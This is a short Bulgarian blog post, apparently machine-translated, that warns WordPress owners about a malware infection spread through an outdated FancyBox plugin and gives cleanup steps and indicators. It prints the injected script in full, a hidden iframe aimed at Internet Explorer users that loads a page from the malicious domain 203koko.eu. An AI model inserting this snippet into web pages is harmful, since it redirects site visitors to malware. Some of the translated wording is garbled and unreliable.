В началото на седмицата серия от сайтове и блогове с WordPress, получи предупреждения от злонамерена инфекция през Google Уеб администратори.
Проблемът, на който Google Уеб администратори се отнася до наличието на треска / писменост iframe malware в източника на уеб страниците.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Изглежда, че това е така уязвимост a плъгинЕ FancyBox за WordPress който до вчера (05.02.2015) не беше актуализиран за дълго време.
Решете този проблем и дезинфекция на вирусни обекти с този злонамерен софтуер, е сравнително проста.
1. Деактивирайте приставката FancyBox.
2. Изтриване на всички FancyBox плъгин файлове от сървъра (чрез FTP)
3. Инсталирайте новата версия на приставката (Fancybox 3.0.4)
FancyBox за WordPress 3.0.4
- Преименува се настройката, засегната от проблема със сигурността, споменат в 3.0.3. Това трябва да спре появата на злонамерен код на сайтове, където е приставката updated, без да премахвате злонамерения код.
FancyBox за WordPress 3.0.3
- Реши проблема със сигурността.
Информация за злонамерен софтуер:
ТИП: Пренасочване на рамката
TARGET: WordPress фантазия кутия
Домейн на MALWARE: 203koko.eu
URI за MALWARE: http://203koko.eu/hjnfh/ipframe2.php
ЗЛОНАМЕРЕН СОУЕР RAW КОДОВЕ:
ПИСМЕНО МАЛВЕР: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Премахнете зловреден софтуер от вашия WordPress уебсайт.
